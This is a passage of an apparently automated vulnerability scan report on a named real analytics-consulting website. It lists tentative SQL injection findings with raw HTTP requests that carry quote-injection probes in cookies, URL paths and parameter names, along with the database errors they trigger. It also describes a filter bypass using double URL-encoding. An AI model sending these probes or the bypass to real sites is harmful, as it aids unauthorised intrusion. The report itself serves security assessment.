GET /blog/urchin/121-urchin-7-new-interface-first-look.html%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:37:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/urchin/121-urchin-7-new-interface-first-look.html%2527%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:37:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:37:56 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:37:56 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:26:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:26:34 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:31:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:31:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:31:06 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:31:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23679
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/urchin'/87-visitor-scoring-with-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:25:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/urchin''/87-visitor-scoring-with-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:25:06 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:25:09 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:25:10 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23209
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/urchin/87-visitor-scoring-with-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:35:09 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/urchin/87-visitor-scoring-with-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:35:10 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:35:10 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:35:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23156
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.148. http://www.analyticspros.com/blog/urchin/88-urchin-vs-google-analytics.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.analyticspros.com
Path:
/blog/urchin/88-urchin-vs-google-analytics.html
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/urchin/88-urchin-vs-google-analytics.html?1'=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:37:30 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/urchin/88-urchin-vs-google-analytics.html?1''=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:37:31 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/urchin/94-exclude-bots-in-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:49:59 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/urchin/94-exclude-bots-in-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:50:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/urchin/94-exclude-bots-in-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:10:34 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/urchin/94-exclude-bots-in-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:10:35 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/webanalytics.html' HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:45:29 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/webanalytics.html'' HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:45:34 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:45:36 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:45:36 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
